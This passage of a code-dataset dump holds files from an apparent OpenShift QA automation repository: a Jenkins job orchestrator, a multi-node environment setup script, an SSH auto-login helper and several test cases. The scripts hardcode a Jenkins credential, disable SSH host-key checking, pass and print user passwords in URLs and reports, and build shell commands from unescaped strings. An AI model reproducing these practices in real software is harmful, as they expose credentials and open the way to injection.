TESTCASE_TAGS(INSTANCE_COUNT can be calculated using TESTCASE_TAGS)'\n return False\n else:\n self.config.instance_count = self.get_instance_count(self.config.testcase_tags)\n else:\n self.config.instance_count = len(self.config.instances.splitlines())\n # Check if it's possible to get/calculate job count with current parameters\n if self.config.openshift_users != None:\n self.config.job_count = len(self.config.openshift_users.splitlines())\n if self.config.job_count == None:\n if self.config.testcase_tags == None:\n print 'Error: Please provide JOB_COUNT or TESTCASE_TAGS(JOB_COUNT can be calculated using TESTCASE_TAGS)'\n return False\n else:\n self.config.job_count = self.get_job_count(self.config.testcase_tags)\n # Get user emails\n self.openshift_user_dict = self.get_users(self.config.job_count)\n if self.openshift_user_dict == None:\n print 'Failed to get user emails. Please check'\n return False\n # Check if INSTANCE_COUNT is less than/equal to JOB_COUNT\n if self.config.instance_count > self.config.job_count:\n print 'Error: INSTANCE_COUNT is larger than JOB_COUNT, which may cause waste of instances.'\n return False\n return True\n\n def create_testrun(self, testrun_tag, testcase_tags):\n cmd = \"python bin/create_test_run.py -t '%s' -g '%s'\" % (testrun_tag, testcase_tags)\n (ret, output) = commands.getstatusoutput(cmd)\n print output\n if ret == 0:\n match = re.search(r'(?<=test_run_id=)\\w+$', output, re.M)\n if match != None:\n return match.group(0)\n return None\n\n def reset_testrun(self, testrun_id, *states):\n cmd = 'python bin/reset_testrun.py %s %s' % (testrun_id, ' '.join(states))\n (ret, output) = commands.getstatusoutput(cmd)\n if ret != 0:\n print output\n return ret\n\n def trigger_job(self, **args):\n url = 'http://ciqe.englab.nay.redhat.com/job/%s/buildWithParameters?token=openshift&delay=0sec&%s' % (self.config.sub_job_name, '&'.join(['%s=%s' % (key,value) for (key,value) in args.items()]))\n cmd = \"curl -s -k --user 'test:redhat' '%s'\" % (url)\n (ret, output) = commands.getstatusoutput(cmd)\n if ret != 0:\n print output\n return ret\n\n def check_instance(self, ip, retry=2, timeout=20):\n cmd = \"ssh -t -t -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=%d root@%s \\\"ls\\\"\" % (PreTestingJob.KEY_PATH, timeout, ip)\n for i in range(retry):\n (ret, output) = commands.getstatusoutput(cmd)\n if ret == 0:\n return True\n return False\n\n def check_existing_instances(self, retry=2, timeout=20):\n cursor = self.db.instances.find()\n for instance in cursor:\n print 'Checking instance: %s' % (instance['ip'])\n if instance['ip'] in (\"int.openshift.redhat.com\", \"stg.openshift.redhat.com\"):\n print 'No need to check stage or INT server'\n elif self.check_instance(instance['ip'], retry=2, timeout=20):\n print 'Instance %s is Active' % (instance['ip'])\n else:\n print 'Failed to ssh connect instance: %s. Remove it from MongoDB.' % (instance['ip'])\n try:\n self.db.instances.remove(instance['_id'], safe=True)\n except OperationFailure, e:\n print 'Warning: failed to remove inactive instance %s(%s) from MongoDB.\\n%s' % (instance['tag'], instance['ip'], e)\n\n def use_instance(self, build_uuid, tag, ip, value=1):\n cursor = self.db.instances.find({'tag':tag, 'ip':ip})\n if cursor.count() == 1:\n instance = cursor[0]\n if build_uuid in instance['users']:\n print 'instance %s(%s) is already being used by user: %s' % (tag, ip, build_uuid)\n return True\n self.db.instances.update({'_id':ObjectId(instance['_id'])}, {'$inc' : {'user_count' : value}})\n self.db.instances.update({'_id':ObjectId(instance['_id'])}, {'$push' : {'users' : build_uuid}})\n return True\n elif cursor.count() <= 0:\n print 'No such instance found: %s(%s)' % (tag, ip)\n return False\n else:\n print 'Multiple instances found: %s(%s). Please check.' % (tag, ip)\n return False\n\n def create_instance(self, tag, ami_id):\n cmd = \"python bin/create_instance.py -n '%s' -m '%s'\" % (tag, ami_id)\n (ret, output) = commands.getstatusoutput(cmd)\n if ret == 0:\n match = re.search(r'(?<=instance_ip=)[\\w.]+$', output, re.M)\n if match != None:\n ip = match.group(0)\n return ip\n else:\n print output\n return None\n\n def add_instance(self, tag, ip):\n cursor = self.db.instances.find({'tag':tag, 'ip':ip})\n if cursor.count() > 0:\n print 'Instance %s(%s) is already in MongoDB' % (tag, ip)\n return True\n try:\n self.db.instances.insert({'tag' : tag, 'ip' : ip, 'user_count' : 0, 'users' : []}, safe=True)\n except OperationFailure, e:\n print 'Error: Failed to add instance to mongodb\\n', e\n return False\n return True\n\n def start(self):\n # To run a test, we need a test run, several instances, and trigger sub jenkins job several times. There're 3 situations:\n # If instances aren't provides, we need to create new instances using AMI_ID and INSTANCE_TAG(optional).\n # If testrun_id isn't provided, we need to create a new test run using TESTCASE_TAGS and TESTRUN_TAG(optional).\n # If instances, testrun_id, ami_id, and testcase_tags are not provided, we need to get AMI_ID and TESTCASE_TAGS from remote.\n # Generate report\n self.report = {}\n self.report['6. Shutdown Instance'] = self.config.shutdown_instance\n self.report['2. TCMS User'] = self.config.tcms_user\n if self.config.testrun_id == None:\n # Get testrun_tag\n if self.config.testrun_tag == None:\n self.config.testrun_tag = self.get_testrun_tag(self.config.testcase_tags, self.config.ami_id)\n # Create test run using testcase_tags\n self.config.testrun_id = self.create_testrun(self.config.testrun_tag, self.config.testcase_tags)\n if self.config.testrun_id == None:\n print 'Error: Unable to create test run.'\n sys.exit(2)\n else:\n # If existing TESTRUN_ID is provided\n if self.config.reset_testrun == 'true':\n if self.reset_testrun(self.config.testrun_id, 'FAILED', 'ERROR', 'RUNNING') == 0:\n print 'Test run %s has been reset' % (self.config.testrun_id)\n else:\n print 'Failed to reset testrun: %s' % (self.config.testrun_id)\n sys.exit(3)\n # Add test run to report\n self.report['1. Test Run'] = 'https://tcms.engineering.redhat.com/run/%s/' % (self.config.testrun_id)\n # Add users to report\n self.report['3. OpenShift Users'] = []\n for user,passwd in self.openshift_user_dict.items():\n self.report['3. OpenShift Users'].append({'Login':user, 'Password':passwd})\n # Create instances or get existing instances\n instance_list = []\n if self.config.instances == None:\n # self.config.ami_id can't possibly be None because it should be either provided or gotten from remote.\n # Get instance_tag\n if self.config.instance_tag == None:\n self.config.instance_tag = self.get_instance_tag(self.config.ami_id)\n # Create instances using ami_id\n for i in range(self.config.instance_count):\n instance_tag = '%s_%s' % (self.config.instance_tag, self.get_build_uuid(6))\n ip = self.create_instance(instance_tag, self.config.ami_id)\n if ip == None:\n print 'Failed to create instance: %s(ami id: %s, ip: %s)' % (instance_tag, self.config.ami_id, ip)\n sys.exit(3)\n if not self.add_instance(instance_tag, ip):\n print 'Warning: Failed to add instance to MongoDB: %s(ami id: %s, ip: %s)' % (instance_tag, self.config.ami_id, ip)\n instance_list.append((instance_tag, ip))\n self.config.instances = \"\\n\".join([instance[1] for instance in instance_list])\n else:\n for (i,ip) in enumerate(self.config.instances.splitlines()):\n instance_list.append((ip, ip))\n if not self.add_instance(ip, ip):\n print 'Failed to add user provided instance(%s) to MongoDB' % (ip)\n sys.exit(4)\n # Add instance count and job count to report\n self.report['4. Instance Count'] = self.config.instance_count\n self.report['5. Jenkins Build Count'] = self.config.job_count\n self.report['7. Instances'] = []\n # Now we have a test run and several instances. Time to trigger sub jenkins jobs.\n jobs_per_instance = self.config.job_count / self.config.instance_count\n remainder = self.config.job_count % self.config.instance_count\n user_iter = self.openshift_user_dict.iteritems()\n for i in range(self.config.instance_count):\n tmp = jobs_per_instance\n if remainder > 0:\n tmp += 1\n remainder -= 1\n if instance_list[i][0] == instance_list[i][1]:\n print 'Instance: %s' % (instance_list[i][1])\n else:\n print 'Instance: %s(%s)' % (instance_list[i][0], instance_list[i][1])\n # Add instance to report\n if instance_list[i][0] == instance_list[i][1]:\n self.report['7. Instances'].append({'Builds Count':tmp, 'IP':instance_list[i][1], 'Jenkins Builds':[]})\n else:\n self.report['7. Instances'].append({'Builds Count':tmp, 'Name':instance_list[i][0], 'IP':instance_list[i][1], 'Jenkins Builds':[]})\n # Trigger jenkins builds\n for j in range(tmp):\n build_uuid = self.get_build_uuid()\n try:\n (user_email, user_passwd) = user_iter.next()\n except StopIteration:\n print 'Strange...accounts should not be less than jobs. Please debug'\n sys.exit(255)\n if self.config.rhc_version == None:\n self.config.rhc_version = ''\n ret = self.trigger_job( INSTANCE_TAG=quote(instance_list[i][0]),\n INSTANCE_IP=quote(instance_list[i][1]),\n TESTRUN_ID=quote(self.config.testrun_id),\n OPENSHIFT_user_email=quote(user_email),\n OPENSHIFT_user_passwd=quote(user_passwd),\n BUILD_UUID=quote(build_uuid),\n TESTPLAN_ID=quote(PreTestingJob.TESTPLAN_ID),\n SHUTDOWN_INSTANCE=quote(self.config.shutdown_instance),\n UPDATE_CLIENT=quote(self.config.update_client),\n RHC_VERSION=quote(self.config.rhc_version),\n RHC_BRANCH=quote(self.config.rhc_branch),\n TCMS_USER=quote(self.config.tcms_user),\n TCMS_PASSWORD=quote(self.config.tcms_password),\n MONGO_CONN_URL=quote(os.environ['MONGO_CONN_URL']))\n # Add time interval to avoid concurrence problems\n print \"Wait for 10 secs to avoid concurrence problems...\"\n time.sleep(10)\n if ret != 0:\n print 'Error: Failed to trigger sub jenkins jobs'\n sys.exit(6)\n if not self.use_instance(build_uuid, instance_list[i][0], instance_list[i][1]):\n print 'Error: Failed to add the user_count of instance %s(%s)' % (instance_list[i][0], instance_list[i][1])\n sys.exit(7)\n # Add jenkins build to report\n self.report['7. Instances'][i]['Jenkins Builds'].append({'Build UUID':build_uuid, 'OpenShift User':{'Login':user_email, 'Password':user_passwd}})\n print '\\n\\nReport:'\n print yaml.dump(self.report, indent=8)\n sys.exit(0)\n\n\nclass UnitTest(PreTestingJob):\n def __init__(self):\n super(UnitTest, self).__init__()\n\n def create_testrun(self, testrun_tag, testcase_tags):\n random.seed()\n return str(random.randint(0, 9999999))\n\n def create_instance(self, instance_tag, ami_id):\n if not ami_id or not instance_tag:\n print 'Failed to create instance'\n return None\n random.seed()\n return '.'.join([str(random.randint(1, 255)) for i in range(4)])\n\n def get_ami_tags(self):\n return ('devenv_2061', 'acceptance,smoke') \n\n def reset_testrun(self, testrun_id, *states):\n print 'Testrun: %s has been reset' % (testrun_id)\n return 0\n\n def trigger_job(self, **args):\n print 'trigger job'\n return 0\n\nif __name__ == '__main__':\n job = PreTestingJob()\n job.start()\n" }, { "alpha_fraction": 0.6207053661346436, "alphanum_fraction": 0.6402730345726013, "avg_line_length": 23.14285659790039, "blob_id": "031a607d040631b8892d062d377ec85b47d9fac3", "content_id": "24d9504c42fca88b1f0db756c1eb2d7abe99d292", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4395, "license_type": "no_license", "max_line_length": 223, "num_lines": 182, "path": "/automation/open/bin/setup_multi_node_env.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n#\n# Generated from https://hosted.englab.nay.redhat.com/issues/11110\n#\n# [email protected]\n#\n\n#set -e\n\nfunction usage(){\n echo \"Usage: $0 <tag> [size=2] [node profiles list]\"\n}\n\nfunction set_profile(){\n node=$1\n profile=$2\n config_file=\"/etc/openshift/resource_limits.conf\"\n profile_file=\"${config_file}.${profile}\"\n ssh -i $HOME/.ssh/libra.pem root@$node <<EOF\n cd /etc/openshift\n rm -f $config_file \n ln -v -s $profile_file $config_file\n /usr/libexec/mcollective/update_yaml.rb /etc/mcollective/facts.yaml\nEOF\n}\n\nfunction add_node2district(){\n DISTRICT_NAME=$1\n NODE=$2\n ssh -i $HOME/.ssh/libra.pem root@verifier <<EOF\n rhc-admin-ctl-district -c add-node -n $DISTRICT_NAME -i $NODE\nEOF\n}\n\nfunction create_district(){\n DISTRICT_NAME=$1\n PROFILE=$2\n #(small(default)|jumbo|exlarge|large|medium|micro|c9) Only needed for create\n ssh -i $HOME/.ssh/libra.pem root@verifier <<EOF\n rhc-admin-ctl-district -c create -n $DISTRICT_NAME -p $PROFILE\nEOF\n}\n\nif [ -z \"$1\" ]; then\n usage;\n exit 2\nfi\n\nTAG=$1\nSIZE=$2\n: ${SIZE:=2}\nshift 2\nPROFILES=$*\n\nTMP=$(mktemp -d) \ncd $TMP\ngit clone [email protected]:openshift/li.git li\nif [ ! -f ./li/build/devenv ]; then\n echo \"Unable to locate LI repository\"\n exit 3;\nfi\n\n#clean .ssh/config from old verifier*\nsed -e \"/verifier/,+3d\" -i $HOME/.ssh/config\nsed -e \"/werifier/,+3d\" -i $HOME/.ssh/config\n\n#1. Prepare two devenv instances, assume their name is \"node1\" and \"node2\".\nfor i in `seq 1 $SIZE`; do\n echo \"Building node#$i\"\n ./li/build/devenv launch ${TAG}${i} --express_server --ssh_config_verifier \n IP=$(ssh verifier ip a ls dev eth0 | awk '/inet/{split($2,a,\"/\");print a[1]}') \n echo \"IP_$i: $IP\"\n sleep 3\n eval \"NODE${i}_IP=$IP\"\n sed -e \"s/verifier$/werifier$i/\" -i $HOME/.ssh/config\ndone\n\n\necho \"Setting BROKER_HOST on $NODE1_IP\"\nsed -e \"s/werifier1/verifier/\" -i $HOME/.ssh/config\nsed -e \"s/werifier/verifier/\" -i $HOME/.ssh/config\nssh root@verifier <<EOF\nsed -i -e \"s/BROKER_HOST=.*/BROKER_HOST=$NODE1_IP/\" /etc/openshift/openshift-node.conf\ncat /etc/openshift/openshift-node.conf | grep BROKER_HOST\nEOF\necho \"done.\"\n\nfor i in `seq 1 $SIZE`; do\n if [ \"$i\" == \"1\" ]; then \n echo \"Setup multi node broker...\"\n ./li/build/devenv setup_multi_node_broker --verbose\n else\n echo \"Adding node#$i ...\"\n ./li/build/devenv add_multi_node_devenv verifier$i --verbose\n fi\n \ndone\n\ni=\"\"\nfor profile in $PROFILES; do\n host=\"verifier$i\"\n echo \"Setting profile to $profile on $host ...\"\n set_profile $host $profile\n if [ \"$i\" == \"\" ]; then\n i=1\n fi\n #setup district per each node profile...\n DISTRICT_NAME=\"qa$profile\"\n echo \"Creating/Updating district: $DISTRICT_NAME\" #per each node profile...\n if [ \"$SIZE\" -gt 1 ]; then\n create_district $DISTRICT_NAME $profile || true #it might fail/ignore it\n eval \"ref=NODE${i}_IP\"\n eval \"IP=\\$$ref\"\n add_node2district $DISTRICT_NAME $IP\n fi\n i=$(( $i+1 ))\ndone\n\n#Cleaning up the LI repository\nrm -rf $TMP\n\necho \"\\nConfiguration:\"\nfor i in `seq 1 $SIZE`; do\n eval \"ref=NODE${i}_IP\"\n eval \"IP=\\$$ref\"\n echo -e \"\\tIP[$i]: $IP\"\ndone\n\nexit 0\n\n======================================AUTO======================================\n\n#1. Prepare two devenv instances, assume their name is \"node1\" and \"node2\".\n\n\nE.g:\n\nnode1's IP: 10.113.42.21 (QPID server, Broker Server and a common Node)\n\n\nnode2's IP: 10.2.187.186 (a common Node)\n\n\n#2. Add the following to ~/.ssh/config in your local machine\n\n\nHost verifier\n User root\n IdentityFile <path-to>/libra.pem\n HostName <node1.public.hostname>\n\n\nHost verifier2\n User root\n IdentityFile <path-to>/libra.pem\n HostName <node2.public.hostname>\n\n\n#3. Git clone li repo. Firstly you need access permission to li repo, if you have not, you can run the following command on a instance without any access permission, then cp all file to your local machine using scp command.\n\n\n$ git clone git://git1.ops.rhcloud.com/li.git\n\n\n#4. On node1, edit /etc/openshift/openshift-node.conf.\n\n# vi /etc/openshift/openshift-node.conf\n\nBROKER_HOST=10.113.42.21\n\n\n#5. Run the following command to setup broker node.\n\n$ cd <li.repo>/build\n\n$ ./devenv setup_multi_node_broker --verbose\n\n\n#6. Run the following command to add a common node.\n\n#$ ./devenv add_multi_node_devenv verifier2 --verbose\n\n" }, { "alpha_fraction": 0.6175979971885681, "alphanum_fraction": 0.6255212426185608, "avg_line_length": 30.14285659790039, "blob_id": "8b686a8f36d4289dc2de41381816333334f3fd97", "content_id": "c4788141404e59d7858e8c305b50c7cabee8033e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2398, "license_type": "no_license", "max_line_length": 160, "num_lines": 77, "path": "/automation/open/testmodules/RT/client/rhc_chk_sshkey.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_filename= common.getRandomString(10)\n self.new_keyname = common.getRandomString(10)\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n tcms_testcase_id=129189\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n try:\n os.system(\"rm -f %s*\"%self.key_filename)\n common.remove_sshkey(self.new_keyname, self.user_email, self.user_passwd)\n except:\n pass\n\n\nclass RhcChkSshkey(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a ssh key\",\n \"ssh-keygen -t dsa -f %s -N '' \" % self.key_filename,\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Add this key to openshift\" ,\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % (self.key_filename), self.new_keyname, self.user_email, self.user_passwd],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check the rhc domain status if throws eception\" ,\n \"eval `ssh-agent`; ssh-add ~/.ssh/id_rsa; rhc domain status -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n case = testcase.TestCase(\"[US1652][UI][CLI] Multi key management rhc domain status\",\n self.steps_list)\n\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcChkSshkey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7025572061538696, "alphanum_fraction": 0.7348586916923523, "avg_line_length": 25.535715103149414, "blob_id": "441d7e1d3e77591f38e0ca1f98b5da0f48f9addf", "content_id": "ef0d2c5eac47f85cdfdd8b8ea3f3e69bcf5a7459", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 743, "license_type": "no_license", "max_line_length": 113, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/ruby19_scaling_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 29, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby19_scaling_without_jenkins import Ruby19ScalingHotDeployWithoutJenkins\n\nclass Ruby19ScalingHotDeployWithJenkins(Ruby19ScalingHotDeployWithoutJenkins):\n def __init__(self, config):\n Ruby19ScalingHotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2443]Hot deployment support for scalable application - with Jenkins - ruby-1.9\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Ruby19ScalingHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.58199542760849, "alphanum_fraction": 0.6106651425361633, "avg_line_length": 22.239999771118164, "blob_id": "00c44cab409a539266f42f6302aaca08d54d4747", "content_id": "8e78494513d1a9e74075547221e939555f085f76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1744, "license_type": "no_license", "max_line_length": 197, "num_lines": 75, "path": "/automation/open/testmodules/UI/web/case_174363.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174360.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateAppWithoutSSHKey(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n #web.delete_app(\"ruby19\")\n #create a ruby1.9 app\n web.create_app(\"ruby-1.9\",\"ruby19\")\n\n #check wether the links are correct\n time.sleep(5)\n \n #ADD ssh key\n web.input_by_id(\"key_raw_content\", '''ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA2AcMMWvrfpIcoHMM/SQbpdlqa8TVb5Y1lJcHovJxHzTHXb18KW7MJ2dvQZdcxfAaGboG1hq5HfUhN/mnubv0QJLsFcVKkpd5Pmi/jnM1NBN5qRo+ZvXR0lU1qssYp0fsCn8K7s6lQALApuAFb+U0vW+3o2i2cJ659TouPRnJhuOHdWmdj5cLDPQRoVh+2RhXOuXcFqryJtyruymC4r92RkikTtHhchBtv2Xsdzn8zwUIWLg3k/CcXuOIHTxw3kAMe5j2qYJ+OLJ/4L9THhA0Zg0szdTYh1k076bIXdVJOiBgUZu+tXRCy2aSn1k0rnp8graLxXx2hicD5tidmIhsBQ== root@mgao''')\n web.driver.find_element_by_id(\"key_submit\").click()\n time.sleep(2)\n web.assert_text_equal_by_xpath(\"Install the Git client for your operating system, and from your command line run\",'''//div[@id='content']/div/div/div/div[2]/div/section[2]/div/div/p[6]''') \n\n\n #delete ssh key\n web.go_to_account()\n web.click_element_by_xpath('''//tr[@id='default_sshkey']/td[3]/a''')\n time.sleep(2)\n \n \n \n #delete a python app\n web.delete_app(\"ruby19\")\n\n\n self.tearDown()\n\n return self.passed(\" case_174360--CreateAppWithoutSSHKey passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateAppWithoutSSHKey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174360.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5809165239334106, "alphanum_fraction": 0.593756914138794, "avg_line_length": 34.2890625, "blob_id": "e4dd40ee05ef3158be4f7f8d3b40cb020bd2e456", "content_id": "d530ee93bcf32cc252c9347199e86fdf30783c1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4517, "license_type": "no_license", "max_line_length": 122, "num_lines": 128, "path": "/automation/open/lib/auto_ssh.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nimport commands\nimport pexpect\n\ndef remote_exec(hostname, username, password, cmd):\n #fout=file('mylog.txt','w')\n #cmd= \"grep 'hello word testing' /tmp/test/test.log\"\n #cmd=\"\"\"/bin/sh -c \"%s\" \"\"\" %(cmd)\n print \">>>\",cmd\n #child = pexpect.spawn(('ssh %s@%s %s' %(username,hostname,cmd)),timeout=6,maxread=2000,logfile=None)\n #child = pexpect.spawn(\"/usr/bin/ssh [email protected]\",[\"grep 'hello word testing' /tmp/mytest.log\"])\n #child = pexpect.spawn(\"\"\"ssh [email protected] \"grep 'hello word testing' /tmp/mytest.log\" \"\"\")\n user_hostname = \"%s@%s\" %(username,hostname)\n child = pexpect.spawn(\"/usr/bin/ssh\",[user_hostname,cmd],timeout=6,maxread=2000,logfile=None)\n child.logfile_read = sys.stdout\n #fout=file('mylog.txt','w')\n #child.logfile=fout\n\n while True:\n index = child.expect(['(yes\\/no)', 'password:', pexpect.EOF, pexpect.TIMEOUT])\n #print index\n if index == 0:\n child.sendline(\"yes\")\n elif index == 1:\n child.sendline(password)\n elif index == 2:\n return child.before\n elif index == 3:\n return \"TIMEOUT!!!\"\n\n#child.logfile_read = None # To turn off log\n\n#a=remote_exec(\"127.0.0.1\",\"root\",\"redhat\",\"cat /tmp/check.log > /tmp/test/test.log\")\n#a=remote_exec(\"127.0.0.1\",\"root\",\"redhat\",\"grep 'hello word testing' /tmp/test/test.log\")\n#print a\n\ndef ssh_key_gen(key_file=None, key_type='rsa'):\n pre_cmd = \"rm -rf %s %s.pub\" %(key_file, key_file)\n if key_file != None:\n cmd = \"%s; /usr/bin/ssh-keygen -t %s -N '' -f %s\" %(pre_cmd, key_type, key_file)\n else:\n cmd = \"%s; /usr/bin/ssh-keygen -t %s -N ''\" %(pre_cmd, key_type)\n print \"Command: %s\" %(cmd)\n return commands.getstatusoutput(cmd)\n\ndef ssh_copy_id(pub_key_file, username, password, hostname):\n user_hostname = \"%s@%s\" %(username, hostname)\n cmd = \"ssh-copy-id -i %s %s\" %(pub_key_file, user_hostname)\n print \"Command: %s\" %(cmd)\n child = pexpect.spawn(cmd, timeout=30, maxread=2000, logfile=None)\n child.logfile_read = sys.stdout\n while True:\n index = child.expect(['(yes\\/no)', 'password:', pexpect.EOF, pexpect.TIMEOUT])\n #print index\n if index == 0:\n child.sendline(\"yes\")\n elif index == 1:\n child.sendline(password)\n elif index == 2:\n break\n elif index == 3:\n print \"TIMEOUT!!! Try ssh connect manually!\"\n break\n\n #print \"-----%s-------\" %(child.before)\n\n if child.before.find(\"Now try logging into the machine\") != -1:\n return 0\n else:\n print \"ssh-copy-id is terminated abnormally, pls check!!!\"\n return 1\n\n \n\n\ndef main():\n usage = \"\"\"\nusage: %s -i target_host -u username -p password [-f key_file] [-t key_type]\n\"\"\" %(os.path.basename(__file__))\n\n from optparse import OptionParser\n parser = OptionParser(usage=usage)\n parser.add_option(\"-i\", \"--target_host\", dest=\"target_host\", help=\"setup auto ssh between local host and target host\")\n parser.add_option(\"-u\", \"--username\", dest=\"username\", help=\"username for logging into target host\")\n parser.add_option(\"-p\", \"--password\", dest=\"password\", help=\"password for loggint into target host\")\n parser.add_option(\"-f\", \"--key_file\", dest=\"key_file\", help=\"specify generated key file. Default: mykey (optional)\")\n parser.add_option(\"-t\", \"--key_type\", dest=\"key_type\", help=\"specify generated key type. Default: rsa (optional)\")\n\n (options, args) = parser.parse_args()\n if options.target_host == None or options.username == None or options.password == None:\n print usage\n sys.exit(1)\n \n if options.key_file == None:\n key_file = \"mykey\"\n else:\n key_file = options.key_file\n\n if options.key_type == None:\n key_type = \"rsa\" \n else:\n key_type = options.key_type\n\n (ret, output) = ssh_key_gen(key_file, key_type)\n print output\n if ret == 0:\n if ssh_copy_id(\"%s.pub\" %(key_file), options.username, options.password, options.target_host) != 0:\n return 1\n else:\n print \"fail to generate ssh key file\"\n return ret\n\n cmd = \"ssh -i %s %s@%s 'free -m'\" %(key_file, options.username, options.target_host)\n print \"Command: %s\" %(cmd)\n (ret, output)=commands.getstatusoutput(cmd)\n print output\n if ret == 0:\n return 0\n else:\n return 1\n\n\n\nif __name__ == \"__main__\":\n exit_code=main()\n sys.exit(exit_code)\n" }, { "alpha_fraction": 0.6007992625236511, "alphanum_fraction": 0.6083481311798096, "avg_line_length": 26.80246925354004, "blob_id": "3ca9b990fcb56c6b5e3fb3ba36888a27a076e601", "content_id": "4a45a181b7745c2293b24d6527745e05b07f938c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2252, "license_type": "no_license", "max_line_length": 99, "num_lines": 81, "path": "/automation/open/testmodules/RT/limits/file_count.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport subprocess\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types['php']\n self.file_count_limit = 40000\n tcms_testcase_id=122322\n \tcommon.env_setup()\n self.steps_list = []\n\n def finalize(self):\n common.destroy_app(self.app_name)\n os.system(\"rm -rf %s\"%self.app_name)\n\n\nclass FileCount(OpenShiftTest):\n\n def gen_files(self):\n for i in range(0, self.file_count_limit):\n retcode = subprocess.call(''.join([\"touch %s/tmp.\"%self.app_name, str(i)]), shell=True)\n return retcode\n\n def test_method(self):\n\n step = testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"generate %s files\"% self.file_count_limit,\n self.gen_files,\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_string_list = ['Disk quota exceeded'])\n# expect_return = 0)\n\n\n case = testcase.TestCase(\"[rhc-limits] file count limit\", self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(FileCount)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5868465304374695, "alphanum_fraction": 0.6172006726264954, "avg_line_length": 19.084745407104492, "blob_id": "2b837c32ae385b025d46ddbf8ad6afff0988ef0c", "content_id": "6176503b9eeb2de5fcdb00acc8ee1b94ebb86677", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1186, "license_type": "no_license", "max_line_length": 65, "num_lines": 59, "path": 